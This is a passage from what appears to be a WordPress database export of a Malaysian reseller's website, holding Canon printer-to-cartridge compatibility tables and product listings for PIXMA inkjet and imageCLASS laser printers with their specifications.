width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-24 16:15:23','2019-09-24 08:15:23','',1449,'https://bintara.com.my/blog/2019/09/24/1449-revision-v1/',0,'revision','',0),(3305,1,'2019-09-24 16:18:07','2019-09-24 08:18:07','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><center></center><center></center><center></center><center></center><center></center><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h3>Laser Printers :-</h3>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<h4>Compact with wireless connectivity</h4><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Printing</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and 